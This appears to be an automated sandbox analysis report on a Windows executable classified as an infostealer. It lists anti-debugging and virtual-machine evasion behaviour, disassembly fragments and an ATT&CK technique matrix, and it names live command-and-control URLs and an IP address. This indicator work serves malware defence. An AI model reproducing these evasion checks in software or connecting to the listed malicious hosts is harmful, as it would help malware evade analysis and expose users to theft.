    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EF0BB2 second address: 6EF0BD9 instructions: 0x00000000 rdtsc 0x00000002 mov bl, al 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ecx, 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F519CFC89C9h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EF0BD9 second address: 6EF0BF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C381h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop esi 0x0000000f mov ecx, edi 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EF0BF7 second address: 6EF0A57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, 2307FA93h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d shr eax, 1 0x0000000f jmp 00007F519CFC89C6h 0x00000014 jmp 00007F520D44DF6Bh 0x00000019 jne 00007F519CFC89ADh 0x0000001b inc ecx 0x0000001c shr eax, 1 0x0000001e jne 00007F519CFC89ADh 0x00000020 imul ecx, ecx, 03h 0x00000023 movzx eax, dl 0x00000026 cdq 0x00000027 sub ecx, 03h 0x0000002a call 00007F519CFD8EADh 0x0000002f cmp cl, 00000040h 0x00000032 jnc 00007F519CFC89C7h 0x00000034 cmp cl, 00000020h 0x00000037 jnc 00007F519CFC89B8h 0x00000039 shld edx, eax, cl 0x0000003c shl eax, cl 0x0000003e ret 0x0000003f or edx, dword ptr [ebp+0Ch] 0x00000042 or eax, dword ptr [ebp+08h] 0x00000045 or edx, 80000000h 0x0000004b pop ebp 0x0000004c retn 0010h 0x0000004f push ebp 0x00000050 push 00000001h 0x00000052 push edx 0x00000053 push eax 0x00000054 call edi 0x00000056 mov edi, edi 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b push ecx 0x0000005c pop edx 0x0000005d rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6ED0CF2 second address: 6ED0CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6ED0CF6 second address: 6ED0CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6ED0CFC second address: 6ED0D16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6ED0D16 second address: 6ED0D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6ED0D1A second address: 6ED0D1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6ED0D1E second address: 6ED0D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6ED0D24 second address: 6ED0D2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EE0527 second address: 6EE052B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EE052B second address: 6EE053B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EE0684 second address: 6EE0772 instructions: 0x00000000 rdtsc 0x00000002 mov si, 396Bh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007F519CFC89BEh 0x00000011 sub ecx, ecx 0x00000013 jmp 00007F519CFC89C1h 0x00000018 xchg eax, edi 0x00000019 pushad 0x0000001a movzx ecx, dx 0x0000001d mov al, dh 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F519CFC89BBh 0x00000026 xchg eax, edi 0x00000027 pushad 0x00000028 call 00007F519CFC89C4h 0x0000002d pushfd 0x0000002e jmp 00007F519CFC89C2h 0x00000033 or esi, 1961D3E8h 0x00000039 jmp 00007F519CFC89BBh 0x0000003e popfd 0x0000003f pop ecx 0x00000040 pushfd 0x00000041 jmp 00007F519CFC89C9h 0x00000046 or cx, 5A06h 0x0000004b jmp 00007F519CFC89C1h 0x00000050 popfd 0x00000051 popad 0x00000052 mov eax, 00000001h 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a pushfd 0x0000005b jmp 00007F519CFC89C3h 0x00000060 and eax, 1E8B693Eh 0x00000066 jmp 00007F519CFC89C9h 0x0000006b popfd 0x0000006c push eax 0x0000006d pop ebx 0x0000006e popad 0x0000006f rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EE0772 second address: 6EE07CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [esi], ecx 0x0000000d pushad 0x0000000e call 00007F519CD4C37Ch 0x00000013 mov di, si 0x00000016 pop eax 0x00000017 mov edx, 5F5D2EB2h 0x0000001c popad 0x0000001d mov ecx, eax 0x0000001f jmp 00007F519CD4C389h 0x00000024 cmp ecx, 01h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F519CD4C37Dh 0x0000002e rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EE07CB second address: 6EE080C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F520D43A7A4h 0x0000000f jmp 00007F519CFC89BEh 0x00000014 pop edi 0x00000015 jmp 00007F519CFC89C0h 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop esi 0x00000020 popad 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EE080C second address: 6EE0812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EE0812 second address: 6EE0816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exe Special instruction interceptor: First address: 1580BFC instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\random(5).exe Special instruction interceptor: First address: 17293F0 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\random(5).exe Special instruction interceptor: First address: 17B98AB instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\random(5).exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
    Source: C:\Users\user\Desktop\random(5).exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
    Source: C:\Users\user\Desktop\random(5).exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
    Source: C:\Users\user\Desktop\random(5).exe Code function: 0_2_01019980 rdtsc 0_2_01019980
    Source: C:\Users\user\Desktop\random(5).exe File Volume queried: C:\ FullSizeInformation
    Source: C:\Users\user\Desktop\random(5).exe Code function: 0_2_00E3255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00E3255D
    Source: C:\Users\user\Desktop\random(5).exe Code function: 0_2_00E329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00E329FF
    Source: random(5).exe, random(5).exe, 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: random(5).exe, 00000000.00000003.2251619808.000000000085F000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258565049.0000000000860000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251454551.0000000000848000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251291489.0000000000843000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251477411.000000000084F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM419-!
    Source: random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
    Source: random(5).exe, 00000000.00000003.2180479747.0000000006741000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: j@jjY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlO#9
    Source: random(5).exe Binary or memory string: Hyper-V RAW
    Source: random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
    Source: random(5).exe, 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: random(5).exe, 00000000.00000003.2178594560.00000000007F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\user\Desktop\random(5).exe System information queried: ModuleInformation
    Source: C:\Users\user\Desktop\random(5).exe Process information queried: ProcessInformation

    Anti Debugging

    Source: C:\Users\user\Desktop\random(5).exe Thread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\random(5).exe Open window title or class name: regmonclass
    Source: C:\Users\user\Desktop\random(5).exe Open window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\random(5).exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\random(5).exe Open window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\random(5).exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\random(5).exe Open window title or class name: ollydbg
    Source: C:\Users\user\Desktop\random(5).exe Open window title or class name: filemonclass
    Source: C:\Users\user\Desktop\random(5).exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\random(5).exe File opened: NTICE
    Source: C:\Users\user\Desktop\random(5).exe File opened: SICE
    Source: C:\Users\user\Desktop\random(5).exe File opened: SIWVID
    Source: C:\Users\user\Desktop\random(5).exe Process queried: DebugPort
    Source: C:\Users\user\Desktop\random(5).exe Code function: 0_2_01019980 rdtsc 0_2_01019980
    Source: C:\Users\user\Desktop\random(5).exe Code function: 0_2_00E31160 SetUnhandledExceptionFilter,0_2_00E31160
    Source: C:\Users\user\Desktop\random(5).exe Code function: 0_2_00E311A3 SetUnhandledExceptionFilter,0_2_00E311A3
    Source: C:\Users\user\Desktop\random(5).exe Code function: 0_2_00E313C9 SetUnhandledExceptionFilter,0_2_00E313C9
    Source: random(5).exe, random(5).exe, 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
    Source: C:\Users\user\Desktop\random(5).exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
    Source: C:\Users\user\Desktop\random(5).exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: procmon.exe
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: wireshark.exe

    Stealing of Sensitive Information

    Source: Yara match File source: Process Memory Space: random(5).exe PID: 5792, type: MEMORYSTR
    Source: Signature Results Signatures: Mutex created, HTTP post and idle behavior
    Source: global traffic TCP traffic: 192.168.2.6:49711 -> 34.147.147.173:80

    Remote Access Functionality

    Source: Yara match File source: Process Memory Space: random(5).exe PID: 5792, type: MEMORYSTR
    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 23 Virtualization/Sandbox Evasion | OS Credential Dumping | 751 Security Software Discovery | 1 Exploitation of Remote Services | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
    Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 23 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Data from Local System | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 13 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 15 Application Layer Protocol | Traffic Duplication | Data Destruction
    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 216 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

    Source | Detection | Scanner | Label | Link
    random(5).exe | 49% | Virustotal | | Browse
    random(5).exe | 45% | ReversingLabs | Win32.Infostealer.Tinba |
    random(5).exe | 100% | Avira | TR/Crypt.TPM.Gen |
    random(5).exe | 100% | Joe Sandbox ML | |
    No Antivirus matches
    Source | Detection | Scanner | Label | Link
    KvgPhome.fortth14vs.top | 100% | Avira URL Cloud | malware |
    http://home.fortth14vs.top/gduZ0 | 100% | Avira URL Cloud | malware |
    http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0U | 100% | Avira URL Cloud | malware |
    http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18 | 100% | Avira URL Cloud | malware |
    http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963 | 100% | Avira URL Cloud | malware |
    .1.1home.fortth14vs.top | 100% | Avira URL Cloud | malware |
    fortth14vsh14vs.top | 0% | Avira URL Cloud | safe |
    http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0 | 100% | Avira URL Cloud | malware |
    home.fortth14vs.top | 100% | Avira URL Cloud | malware |
    http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah | 100% | Avira URL Cloud | malware |
    http://home.fortth14vs.top/gduZ | 100% | Avira URL Cloud | malware |
    http://home.fortth14vs.top/gduZT | 100% | Avira URL Cloud | malware |
    .for8014vs.top | 0% | Avira URL Cloud | safe |
    .forth14vs.top | 0% | Avira URL Cloud | safe |
    http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738lse | 100% | Avira URL Cloud | malware |
    http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738 | 100% | Avira URL Cloud | malware |
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    home.fortth14vs.top | 34.147.147.173 | true | false | | high
    httpbin.org | 34.200.57.114 | true | false | | high
    Name | Malicious | Antivirus Detection | Reputation
    .1.1home.fortth14vs.top | true | Avira URL Cloud: malware | unknown
    KvgPhome.fortth14vs.top | true | Avira URL Cloud: malware | unknown
    fortth14vsh14vs.top | true | Avira URL Cloud: safe | unknown
    https://httpbin.org/ip | false | | high
    home.fortth14vs.top | true | Avira URL Cloud: malware | unknown
    http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0 | true | Avira URL Cloud: malware | unknown
    .for8014vs.top | true | Avira URL Cloud: safe | unknown
    .forth14vs.top | true | Avira URL Cloud: safe | unknown
    http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738 | true | Avira URL Cloud: malware | unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://html4/loose.dtdrandom(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpfalse
            high
            https://curl.se/docs/http-cookies.htmlrandom(5).exe, random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpfalse
              high
              http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://home.fortth14vs.top/gduZ0random(5).exe, 00000000.00000003.2251332310.000000000086B000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251291489.0000000000843000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258581917.000000000086C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963random(5).exe, 00000000.00000002.2257978659.00000000007BE000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              https://curl.se/docs/alt-svc.htmlrandom(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpfalse
                high
                http://.cssrandom(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpfalse
                  high
                  https://curl.se/docs/hsts.htmlrandom(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpfalse
                    high
                    https://curl.se/docs/alt-svc.html#random(5).exefalse
                      high
                      https://httpbin.org/ipbeforerandom(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpfalse
                        high
                        http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0Urandom(5).exe, 00000000.00000003.2251580735.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258142461.00000000007F5000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMahrandom(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://curl.se/docs/hsts.html#random(5).exefalse
                          high
                          http://home.fortth14vs.top/gduZrandom(5).exe, random(5).exe, 00000000.00000003.2251332310.000000000086B000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251291489.0000000000843000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258581917.000000000086C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://home.fortth14vs.top/gduZTrandom(5).exe, 00000000.00000003.2251332310.000000000086B000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251291489.0000000000843000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258581917.000000000086C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://curl.se/docs/http-cookies.html#random(5).exefalse
                            high
                            http://.jpgrandom(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpfalse
                              high
                              http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738lserandom(5).exe, 00000000.00000002.2257978659.00000000007BE000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
| 34.147.147.173 | home.fortth14vs.top | United States | | 2686 | ATGS-MMD-ASUS | false |
| 34.200.57.114 | httpbin.org | United States | | 14618 | AMAZON-AESUS | false |
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1583231
                              Start date and time:2025-01-02 09:14:09 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 3m 56s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:5
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:random(5).exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Stop behavior analysis, all processes terminated
                              • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                              • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              No simulations
                                              No created / dropped files found
                                              File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                              Entropy (8bit):7.987379795408887
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • VXD Driver (31/22) 0.00%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:random(5).exe
                                              File size:4'484'096 bytes
                                              MD5:f200a3445a8034d201eeb79bb29e1d73
                                              SHA1:473cd32eb4bc8ff05c3e608b86ba651fc4d7b0e1
                                              SHA256:ee6c112a14a1e5a9429b47f5b810f61a58e77860eea867e064d2ab40582757cc
                                              SHA512:6170ced6054e3df739312e54d89bf969c305b5eb34dff3e1645a11f2614463d41bf1d98a21e94d6b611654e4a0bfae1164c9cfb0e84d8149a15711976a81daa7
                                              SSDEEP:98304:tteL6ZJc0HazXMrBDxmWsmzM4bLvM17r1hLYe44:bZJB6zXMF9mqM4vvM175ZYe44
                                              TLSH:D926333FD8A3549BCD11053C646424504BFC1B717FABF08B73EA9A185B6BE30A89D9E1
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..M...w..2............M...@..........................0........E...@... ............................
                                              Icon Hash:00928e8e8686b000
                                              Entrypoint:0x10a0000
                                              Entrypoint Section:.taggant
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                              DLL Characteristics:DYNAMIC_BASE
                                              Time Stamp:0x677235C4 [Mon Dec 30 05:55:16 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74c05f | 0x73 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x74b000 | 0x2b0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x778200 | 0x688 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc9ec64 | 0x10 | whflkpvn |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0xc9ec14 | 0x18 | whflkpvn |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| | 0x1000 | 0x74a000 | 0x289000 | bb5665c7ec03789c4cae8efab810e2fd | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x74b000 | 0x2b0 | 0x200 | c23d0a8d303bd845ffc1175accd22166 | False | 0.80078125 | data | 5.9750009673578965 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x74c000 | 0x1000 | 0x200 | 52564c2cea63394dbc4e71775ebabcc0 | False | 0.166015625 | data | 1.1589685166080708 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
